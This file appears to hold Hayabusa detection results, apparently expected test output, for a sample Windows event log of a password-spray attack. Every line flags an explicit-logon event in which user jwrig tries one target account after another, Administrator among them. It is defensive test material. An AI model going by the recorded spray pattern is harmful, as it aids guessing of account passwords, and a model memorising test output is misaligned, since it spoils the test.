+2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
+2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process:  | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
